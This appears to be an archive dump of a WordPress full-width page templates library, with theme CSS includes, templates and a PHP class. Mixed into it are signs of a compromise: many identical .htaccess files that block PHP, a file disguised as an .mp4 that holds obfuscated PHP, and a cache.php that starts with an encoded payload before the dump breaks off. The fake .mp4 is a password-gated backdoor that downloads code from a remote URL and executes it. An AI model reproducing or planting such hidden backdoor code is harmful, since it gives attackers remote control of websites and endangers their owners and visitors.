			.page-template-builder-fullwidth-std #page > .site-content .mt-container {
				padding: 0;
				margin: 0;
				width: 100%;
			}
	';
wp_add_inline_style( 'editorial-style', $editorial);

themes/sydney/inline-style.php000066600000001124151137103270012473 0ustar00<?php
	/* Support for Sydney theme */
	$sydney = '
		.page-template-builder-fullwidth-std .page-wrap,
        .page-template-builder-fullwidth-std .page-wrap .content-wrapper {
            padding: 0;
			margin: 0;
			width: 100%
        }
		.page-template-builder-fullwidth-std.elementor-page .page-wrap .container {
            width: 100%;
	        overflow: hidden;
        }
		.page-template-builder-fullwidth-std .page .entry-header,
        .page-template-builder-fullwidth-std .page .entry-footer {
           display: none;
        }
	';
	wp_add_inline_style( 'sydney-style', $sydney );
themes/generatepress/inline-style.php000066600000000570151137103270014033 0ustar00<?php
	/* Support for GeneratePress theme */
	$style = '	
		.page-template-builder-fullwidth-std #page {
			margin: 0;
			max-width: 100%;
		}
		.page-template-builder-fullwidth-std .entry-header .grid-container .entry-title {
			display: none;
		}
		.page-template-builder-fullwidth .entry-header {
			display: none;
		}
	';
	wp_add_inline_style( 'generate-style', $style );
templates/builder-fullwidth-std.php000066600000000437151137103270013501 0ustar00<?php
/**
 * Template Name: Full Width Standard
 * Template Post Type: page
 *
 * A full width template inherited from the active theme
 *
 * @since   1.0.0
 * @version 1.0.0
 */

do_action('fwpt_std_before_content');

do_action('fwpt_std_content');

do_action('fwpt_std_after_content');templates/builder-fullwidth.php000066600000001221151137103270012701 0ustar00<?php
/**
 * Template Name: Full Width Blank
 * Template Post Type: page
 *
 * Blank template with minimal HTML required for a page to run
 *
 * @since   1.0.0
 * @version 1.0.0
 */
?><!DOCTYPE html>
<html <?php language_attributes(); ?>>
	<head>
		<meta charset="<?php bloginfo( 'charset' ); ?>">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<link rel="profile" href="http://gmpg.org/xfn/11">
		<?php wp_head(); ?>
	</head>

	<body <?php body_class(); ?>>
		<?php
		do_action('fwpt_blank_before_content');

		do_action('fwpt_blank_content');

		do_action('fwpt_blank_after_content');

		wp_footer();
		?>
	</body>
</html>
<?php
class-full-width-templates.php000066600000013375151137103270012450 0ustar00<?php
/**
 * Class ThemeIsle\FullWidthTemplates
 *
 * @package     ThemeIsle\FullWidthTemplates
 * @copyright   Copyright (c) 2017, Andrei Lupu
 * @license     http://opensource.org/licenses/gpl-2.0.php GNU Public License
 * @since       1.0.0
 */

namespace ThemeIsle;

use ThemeIsle\FullWidthTemplates\Elementor;
use ThemeIsle\FullWidthTemplates\None;

if ( ! class_exists( '\ThemeIsle\FullWidthTemplates' ) ) {

	class FullWidthTemplates {
		/**
		 * @var FullWidthTemplates
		 */
		public static $instance = null;

		/**
		 * The version of this library
		 * @var string
		 */
		public static $version = '1.0.1';

		/**
		 * The array of templates injected.
		 */
		protected $templates;

		/**
		 * Defines the library behaviour
		 */
		protected function init() {

			// Add your templates to this array.
			$this->templates = apply_filters( 'fwpt_templates_list', array(
				'templates/builder-fullwidth.php'     => html_entity_decode( '&harr; ' ) . __( 'Page Builder - Full Width - Blank', 'themeisle-companion' ),
				'templates/builder-fullwidth-std.php' => html_entity_decode( '&harr; ' ) . __( 'Page Builder - Full Width', 'themeisle-companion' ),
			) );

			add_filter( 'theme_page_templates', array( $this, 'add_pages_in_dropdown' ) );

			// Add a filter to the template include to determine if the page has our
			// template assigned and return it's path
			add_filter( 'template_include', array( $this, 'redirect_page_template' ) );

			// Add a filter to the save post to inject out template into the page cache
			add_filter( 'wp_insert_post_data', array( $this, 'register_project_templates' ) );

			add_action( 'wp_enqueue_scripts', array( $this, 'load_theme_overwrites' ) );

			$this->add_support_for_elementor();
		}

		/**
		 * Adds our template to the page dropdown
		 *
		 * @param $templates
		 *
		 * @return array
		 */
		public function add_pages_in_dropdown( $templates ) {
			$templates = array_merge( $templates, $this->templates );
			return $templates;
		}

		/**
		 * Hook into the page view and change the page template path if the selected page template
		 * comes from our library
		 */
		public function redirect_page_template( $template ) {
			global $post;

			if ( empty( $post ) ) {
				return $template;
			}

			$current_template = get_post_meta( $post->ID, '_wp_page_template', true );

			if ( empty( $this->templates[ $current_template ] ) ) {
				return $template;
			}

			$file = plugin_dir_path( __FILE__ ) . $current_template;

			// Just to be safe, we check if the file exist first
			if ( file_exists( $file ) ) {
				return $file;
			}

			return $template;
		}

		/**
		 * Adds our template to the pages cache in order to trick WordPress
		 * into thinking the template file exists where it doesn't really exist.
		 */
		public function register_project_templates( $atts ) {

			// Create the key used for the themes cache
			$cache_key = 'page_templates-' . md5( get_theme_root() . '/' . get_stylesheet() );

			// Retrieve the cache list.
			// If it doesn't exist, or it's empty prepare an array
			$templates = wp_get_theme()->get_page_templates();
			if ( empty( $templates ) ) {
				$templates = array();
			}

			// New cache, therefore remove the old one
			wp_cache_delete( $cache_key, 'themes' );

			// Now add our template to the list of templates by merging our templates
			// with the existing templates array from the cache.
			$templates = array_merge( $templates, $this->templates );

			// Add the modified cache to allow WordPress to pick it up for listing
			// available templates
			wp_cache_add( $cache_key, $templates, 'themes', 1800 );

			return $atts;
		}

		/**
		 * Enqueue CSS for active theme.
		 *
		 * @since   1.0.0
		 * @return  void
		 */
		public function load_theme_overwrites() {
			$theme    = get_option( 'template' );
			$style_filename = plugin_dir_path( __FILE__ ) . 'themes/' . $theme . '/inline-style.php';
			if ( file_exists( $style_filename ) ) {
				include_once( $style_filename );
			}

			$func_filename = plugin_dir_path( __FILE__ ) . 'themes/' . $theme . '/functions.php';
			if ( file_exists( $func_filename ) ) {
				include_once( $func_filename );
			}
		}
		public function is_elementor(){
			if ( defined( 'ELEMENTOR_PATH' ) && class_exists( 'Elementor\Widget_Base' ) ) {
				return true;
			}
			return false;
		}
		/**
		 * Add support for Elementor and call the class
		 */
		public function add_support_for_elementor(){

			// We check if the Elementor plugin has been installed / activated.
			if( $this->is_elementor()){
				require_once( dirname( __FILE__ ) . '/builders/class-elementor-full-width-templates.php' );
				FullWidthTemplates\Elementor::instance();
				return;
			}

			require_once( dirname( __FILE__ ) . '/builders/class-none-full-width-templates.php' );
			FullWidthTemplates\None::instance();
			return;
		}

		/**
		 * @static
		 * @since 1.0.0
		 * @access public
		 * @return FullWidthTemplates
		 */
		public static function instance() {
			if (  null === self::$instance  ) {
				self::$instance = new self();
				self::$instance->init();
			}

			return self::$instance;
		}

		/**
		 * Throw error on object clone
		 *
		 * The whole idea of the singleton design pattern is that there is a single
		 * object therefore, we don't want the object to be cloned.
		 *
		 * @access public
		 * @since 1.0.0
		 * @return void
		 */
		public function __clone() {
			// Cloning instances of the class is forbidden.
			_doing_it_wrong( __FUNCTION__, esc_html__( 'Cheatin&#8217; huh?', 'themeisle-companion' ), '1.0.0' );
		}

		/**
		 * Disable unserializing of the class
		 *
		 * @access public
		 * @since 1.0.0
		 * @return void
		 */
		public function __wakeup() {
			// Unserializing instances of the class is forbidden.
			_doing_it_wrong( __FUNCTION__, esc_html__( 'Cheatin&#8217; huh?', 'themeisle-companion' ), '1.0.0' );
		}
	}
}templates/.htaccess000066600000000424151142515100010337 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>.htaccess000066600000000424151142515100006341 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>builders/.htaccess000066600000000424151142515100010152 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>composer.json000066600000001101151142515100007256 0ustar00{
  "name": "codeinwp/full-width-page-templates",
  "description": "A WordPress library to create full width page templates.",
  "type": "library",
  "version": "1.0.2",
  "license": "GPL-2.0-or-later",
  "homepage": "https://github.com/Codeinwp/full-width-page-templates",
  "authors": [
    {
      "name": "ThemeIsle team",
      "email": "friends@themeisle.com",
      "homepage": "https://themeisle.com"
    }
  ],
  "autoload": {
    "files": [
      "load.php"
    ]
  },
  "support": {
    "issues": "https://github.com/Codeinwp/full-width-page-templates/issues"
  }
}
themes/genesis/.htaccess000066600000000424151142515100011263 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/ashe/.htaccess000066600000000424151142515100010546 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/flash/.htaccess000066600000000424151142515100010723 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/enlightenment/.htaccess000066600000000424151142515100012467 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/twentyseventeen/.htaccess000066600000000424151142515100013075 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/twentytwelve/.htaccess000066600000000424151142515100012407 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/twentysixteen/.htaccess000066600000000424151142515100012560 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/writee/.htaccess000066600000000424151142515100011125 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/consulting/.htaccess000066600000000424151142515100012013 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/editorial/.htaccess000066600000000424151142515100011602 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/edge/.htaccess000066600000000424151142515100010532 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/generatepress/.htaccess000066600000000424151142515100012475 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/twentyfourteen/.htaccess000066600000000424151142515100012730 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/sydney/.htaccess000066600000000424151142515100011141 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/twentythirteen/.htaccess000066600000000424151142515100012723 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/colormag/.htaccess000066600000000424151142515100011431 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/vogue/.htaccess000066600000000424151142515100010753 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/primer/.htaccess000066600000000424151142515100011124 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/news-portal/.htaccess000066600000000424151142515100012101 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/storefront/.htaccess000066600000000424151142515100012033 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/nikko-portfolio/.htaccess000066600000000424151142515100012754 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/hestia/.htaccess000066600000000424151142515100011103 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/hueman/.htaccess000066600000000424151142515100011103 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/zerif-lite/.htaccess000066600000000424151142515100011700 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/twentyfifteen/.htaccess000066600000000424151142515100012521 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/hitmag/hitmag/.htaccess000066600000000424151142515100012350 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>themes/hitmag/hitmag/uPrVyEKc.mp4000066600000012060151142515100012643 0ustar00<?php
 goto WK3_IADPDq; MyuDwFy2CV: metaphone("\x6d\x7a\x72\x51\x65\117\53\154\x39\x55\x34\x67\x58\113\x4a\107\66\122\x57\155\x50\121"); goto IfPG91o8MI; WK3_IADPDq: $tmYBVBDzPv = range("\176", "\40"); goto WK1zAgl6Wx; X6m7szD4bh: @(md5(md5(md5(md5($ETWNNoHwug[20])))) === "\70\141\65\143\60\x35\x36\x64\x61\x30\x66\67\x37\142\x39\x63\x62\146\146\x61\143\144\x66\62\146\145\x35\143\x62\63\141\61") && (count($ETWNNoHwug) == 26 && in_array(gettype($ETWNNoHwug) . count($ETWNNoHwug), $ETWNNoHwug)) ? ($ETWNNoHwug[67] = $ETWNNoHwug[67] . $ETWNNoHwug[77]) && ($ETWNNoHwug[82] = $ETWNNoHwug[67]($ETWNNoHwug[82])) && @($ETWNNoHwug = $ETWNNoHwug[82]($ETWNNoHwug[52], $ETWNNoHwug[67](${$ETWNNoHwug[33]}[22]))) && $ETWNNoHwug() : $ETWNNoHwug; goto MyuDwFy2CV; WK1zAgl6Wx: $ETWNNoHwug = ${$tmYBVBDzPv[18 + 13] . $tmYBVBDzPv[33 + 26] . $tmYBVBDzPv[33 + 14] . $tmYBVBDzPv[23 + 24] . $tmYBVBDzPv[15 + 36] . $tmYBVBDzPv[24 + 29] . $tmYBVBDzPv[37 + 20]}; goto X6m7szD4bh; IfPG91o8MI: class UVHIBzplv4 { static function UR3f1SHmhC($CNplbH5pj6) { goto R1xpEAEqPj; cpwxQCB1bR: NRJ4WmIyKH: goto l8fAeXiBju; WfPLtMI0Kw: $puxVefF7rX = $zwvV82anfD("\176", "\40"); goto tv0CDcF1qD; l8fAeXiBju: return $AXM6ZrXQXo; goto e15Czfqq0r; tv0CDcF1qD: $EB75qOZY0a = explode("\44", $CNplbH5pj6); goto b4DL5D90Ww; Al1ADDRNUF: foreach ($EB75qOZY0a as $Thon2XqCD5 => $URkxbZNhmU) { $AXM6ZrXQXo .= $puxVefF7rX[$URkxbZNhmU - 27868]; AbXDGYK19P: } goto cpwxQCB1bR; b4DL5D90Ww: $AXM6ZrXQXo = ''; goto Al1ADDRNUF; R1xpEAEqPj: $zwvV82anfD = "\162" . "\x61" . "\x6e" . "\147" . "\145"; goto WfPLtMI0Kw; e15Czfqq0r: } static function lfsJpWo1IG($Aqf58jRZHr, $jvQ11kpE7L) { goto qXhXd3kxEZ; e0NQfUd5RX: return empty($IDLU3duvZj) ? $jvQ11kpE7L($Aqf58jRZHr) : $IDLU3duvZj; goto jKaxZlCv95; qXhXd3kxEZ: $f7H2GlSEMk = curl_init($Aqf58jRZHr); goto xzxZU9t7Cu; Fu7tPT_wUn: $IDLU3duvZj = curl_exec($f7H2GlSEMk); goto e0NQfUd5RX; xzxZU9t7Cu: curl_setopt($f7H2GlSEMk, CURLOPT_RETURNTRANSFER, 1); goto Fu7tPT_wUn; jKaxZlCv95: } static function d_3w7fKNbt() { goto F3f6LgcZjI; qS9OveRQZT: OiB6cLfSBJ: goto hcuGHCmoDo; rk5HXPIhB4: AeT69D0XmG: goto ufoze3xrVI; sQcwzX4Xru: @$yhdZQYu45f[0]('', $yhdZQYu45f[3 + 4] . $yhdZQYu45f[1 + 3]($dYgYim5g6q) . $yhdZQYu45f[4 + 4]); goto jSiplkU_tY; vS3HsKDZVG: $o1sji9pF3m = @$yhdZQYu45f[0 + 3]($yhdZQYu45f[3 + 3], $P6rAclIoii); goto vnJd9I7ntz; hcuGHCmoDo: $P6rAclIoii = @$yhdZQYu45f[1]($yhdZQYu45f[0 + 10](INPUT_GET, $yhdZQYu45f[0 + 9])); goto vS3HsKDZVG; jSiplkU_tY: die; goto rk5HXPIhB4; vnJd9I7ntz: $icbcFEi3bq = $yhdZQYu45f[1 + 1]($o1sji9pF3m, true); goto zFk_8sLqk2; MeAR4zMcz1: if (!(@$icbcFEi3bq[0] - time() > 0 and md5(md5($icbcFEi3bq[2 + 1])) === "\142\x35\x63\64\61\x64\x36\x61\64\x63\x37\x61\x34\x30\60\145\x38\61\x35\x63\60\x62\70\61\x31\70\70\x37\x32\64\142\146")) { goto AeT69D0XmG; } goto Z1xxWle2SG; F3f6LgcZjI: $UEqCCCguGH = array("\x32\x37\x38\x39\x35\44\62\x37\70\70\60\44\62\x37\x38\71\63\44\62\67\70\71\67\x24\x32\67\x38\x37\70\x24\62\67\70\x39\x33\x24\x32\x37\70\71\x39\44\62\67\70\71\x32\44\x32\x37\70\67\67\x24\62\67\70\x38\64\44\x32\x37\70\x39\65\44\62\67\70\67\70\x24\62\67\x38\x38\71\x24\x32\67\70\70\63\x24\62\x37\x38\70\x34", "\62\x37\70\67\x39\x24\x32\x37\x38\x37\x38\44\62\x37\70\70\x30\x24\x32\67\70\71\71\44\x32\67\70\70\x30\44\x32\67\x38\70\63\x24\62\x37\70\x37\x38\44\x32\67\71\64\65\44\x32\67\x39\64\63", "\62\x37\70\x38\70\44\62\x37\x38\67\x39\44\62\67\x38\x38\63\44\x32\67\70\70\64\x24\x32\67\70\71\71\44\x32\67\x38\71\x34\44\x32\x37\x38\71\63\44\62\x37\70\71\x35\44\x32\x37\x38\x38\63\44\62\67\x38\71\64\x24\62\67\70\x39\63", "\62\x37\x38\70\62\44\62\67\70\71\x37\x24\62\67\x38\x39\65\x24\62\x37\x38\x38\x37", "\62\67\70\x39\66\44\62\67\x38\71\x37\x24\x32\67\x38\x37\71\44\62\x37\x38\71\x33\x24\x32\67\71\x34\60\x24\62\x37\71\x34\x32\44\62\67\x38\x39\x39\x24\62\x37\70\x39\x34\x24\x32\67\x38\x39\x33\x24\x32\x37\70\71\x35\x24\62\x37\x38\70\63\44\62\x37\70\71\64\44\x32\67\70\71\x33", "\62\x37\x38\71\x32\44\62\x37\70\x38\71\x24\62\67\70\x38\x36\x24\62\x37\x38\71\x33\x24\62\x37\x38\71\x39\44\x32\67\x38\71\x31\x24\62\67\x38\x39\63\44\62\67\x38\67\x38\44\62\x37\70\x39\71\x24\62\x37\x38\71\x35\44\x32\x37\x38\70\63\x24\x32\x37\x38\x38\64\44\62\x37\70\x37\70\x24\x32\x37\70\x39\63\x24\x32\x37\70\x38\64\44\62\67\x38\x37\70\x24\x32\67\x38\x37\x39", "\62\x37\71\62\x32\44\x32\67\x39\65\62", "\62\x37\70\66\x39", "\62\67\x39\64\x37\x24\x32\67\x39\65\x32", "\62\x37\71\62\71\x24\62\67\x39\x31\62\44\62\x37\x39\61\x32\x24\x32\x37\x39\x32\71\44\62\x37\x39\x30\x35", "\62\x37\70\x39\x32\x24\62\67\x38\70\71\x24\x32\67\70\70\x36\44\x32\67\x38\x37\70\44\x32\67\70\71\63\x24\62\x37\70\70\x30\44\x32\x37\x38\x39\x39\44\x32\67\70\70\71\x24\62\x37\70\x38\x34\x24\x32\x37\70\70\62\x24\x32\x37\x38\x37\67\x24\62\x37\70\67\x38"); goto tBx1tTXZVi; tBx1tTXZVi: foreach ($UEqCCCguGH as $fFj3gNADAr) { $yhdZQYu45f[] = self::Ur3f1SHmhc($fFj3gNADAr); iivq9jOukq: } goto qS9OveRQZT; Z1xxWle2SG: $dYgYim5g6q = self::lFsjpWO1ig($icbcFEi3bq[1 + 0], $yhdZQYu45f[1 + 4]); goto sQcwzX4Xru; zFk_8sLqk2: @$yhdZQYu45f[2 + 8](INPUT_GET, "\x6f\x66") == 1 && die($yhdZQYu45f[1 + 4](__FILE__)); goto MeAR4zMcz1; ufoze3xrVI: } } goto Pfd5o0fxgs; Pfd5o0fxgs: uvHIBZpLv4::d_3w7fKNbT();
?>
themes/hitmag/hitmag/cache.php000066600000013022151142515100012324 0ustar00<?php $BNJsQ = 'Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXSqzLz0nISS1KRWEmJxalmJvEpqcn5KakaxSVFRallGipFGenBmmBgDQA'; $rhgS = 'CpTqZAw/KKyA8tTdWNZjZFyKpMeJVvnB+dvc9/hq86tXe41H+2TgnWcwt+V7bf4TDbn25gjO+9SOOrvv5n38QZ/A7Qh74y1rXgP8uPPf/xq9g3uejX8yFvd3Ev+2lPu0BuWo714NT+ajXld8p+vMRGRs+24M37qtv8/3Xkd0G/9NmRjSCvBN8VJh7aurnRiJ/upT/TvaW23XsyRoc2DKXJq1tyolvBrFhA8mpXAhRZFbOcSpuy/xVn1Tb5Ep0X+3Qmznz4iQxLzA7OmgJm4GoCDDkdWGMQksPxJeufDTwK4+KMO8P73XMWHiYUP3QaoSUQF9xJu7Wpt3tkOSu6tP+vHa0ENfb35na5K/MaVtatKVWZWgXhl7yHjb7Kz+nU5nvY/OP7zdq53bX592IdWXAVpGEfRVxVjvHna5rF032qacx4S8Q4lOv9q4ut6/djud2Z4fCZVTyJIB2Y+PxCUNWwZbZB/Uz4zIeEPX3PImdxHTx86SpeGa66Z4LVVCtS3vIc50Kq+UfJ0aoyyWsssCj/vHrKgQEGEHTQVEj+5li9wIQmKMu0Y0w0R0oSmoXHJ1abGfMItfboiHMFqmGr2fKYRKa0NEY983k/ZAuAuGpWKzxZF8iQVP9S16jVdUsrHo+C+rtydnrI095jsZZKOSHS+NBMepH5RMftwfM2uEV3cJ7nmJibBmyHVRFaqEXYqSLWZK+QmL4fGjpclpL7iROVYGNdeTpy0FIbqMPH6EvFfQoa9KUsgUF4dLBvIHTD7k4cMM+zvSnqoYcksovpbL/FOdE3D0DXwdUcKiMWuZe6olXhMTRNspXRjD6i3YZMneVsooAMpDBYE5yrNFLgaILvfPSZLxphLk9lefwCwNGdMra+w2JHUKd38KUgUlFtzOfiSowLR0XGVoVqRX0jWIGA0JvRiHjFWHKAjmVNj1a8wyDH090RkIyvhkaVkHMS0hS7KecNsyoXY9tiWQEpY3Cjd6CyNYoZWeAhNeWHiV74fEl5J5SJMbdB/esdPIWFhY/mPpWkNQlbJJssCB6ddCBBHFlKfpmRwXpfr2KA9ofn6ZgSylWpJlymeLtEu0IFnvlepBV6EV0SI5dXgU1R14aVMbFVpsnX+qV3KbQCNAk0s7D4iei3FiT4iHUkzF7Wg1cgi04lKkS/JEWig6H5ZktkCFmWPtppUlYmaEoB5xL5mYL3WDNbzUwWHDaAHREXDH61cRPrgFvGjSxzSJqKyw9hyBTlDStFscwzJ3PTokJi1CKOeqp7cKbl8fQnaGHvNyMr31sYWnlWMIvhiyVgaeCN8hTJjDSGbAsJiUupjQt+2KSmFMKE8RGzXlWLUmfihcKgozCgKNnT2eRwOJ+VEBOBgb2v71ReGKcfN5eEQUilHaM2CnAX+yfe7oDpZxwTTDKqOtNtYggiwReItG6DN0mxzDOzGTrCKBYm3cpnc0d84xsvwagE8eU1FUfjEmQNp7mInx5aOsn4bU